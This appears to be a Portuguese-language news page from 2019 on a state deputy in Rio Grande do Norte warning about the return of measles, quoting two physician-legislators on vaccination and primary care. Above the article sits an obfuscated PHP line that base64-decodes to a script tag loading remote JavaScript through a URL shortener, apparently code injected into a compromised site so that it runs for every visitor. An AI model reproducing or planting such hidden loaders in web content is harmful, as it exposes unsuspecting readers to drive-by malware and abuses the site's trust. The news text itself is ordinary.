$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputado Vivaldo Costa fala sobre retorno de casos de sarampo no Brasil

Deputado Vivaldo Costa fala sobre retorno de casos de sarampo no Brasil
22 Ago 2019

O deputado estadual Vivaldo Costa (PSD) demonstrou preocupação com a ameaça de retorno do sarampo. O sarampo era considerado uma doença erradicada no Brasil desde 2016, quando a Organização Mundial da Saúde (OMS) identificou que o país estava há um ano sem registro de casos do vírus, mas a confirmação de um caso em Natal ameaça esse título.

“Eu assinei muitos atestados de óbito ao longo da minha carreira de médico e a causa de morte eram doenças infectocontagiosas. Em sua maioria crianças pobres eram a maioria das vítimas. Por isso, quem tem sensibilidade com o povo está preocupado com esse quadro atual”, disse Vivaldo Costa em pronunciamento na manhã desta quarta-feira (21).

O deputado destacou a importância da informação para prevenir a disseminação de alguns casos. “Às vezes basta uma palavra. Por isso gostaria de alertar a população do RN e destacar a medida sensata do Ministro da Saúde que permite a vacinação de crianças a partir dos seis meses de idade”, informou.

Em aparte, o deputado e também médico Dr. Bernando (Avante), falou sobre a importância da assistência médica. “Lembro de ouvir os sinos da igreja tocar a cada criança que falecia. Diziam que eram anjos, mas na verdade eram vítimas de doenças infectocontagiosas. Isso mudou quando a atenção básica foi implantada. Por isso não podemos retroceder no tempo e deixar os sinos voltarem a tocar”, finalizou.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *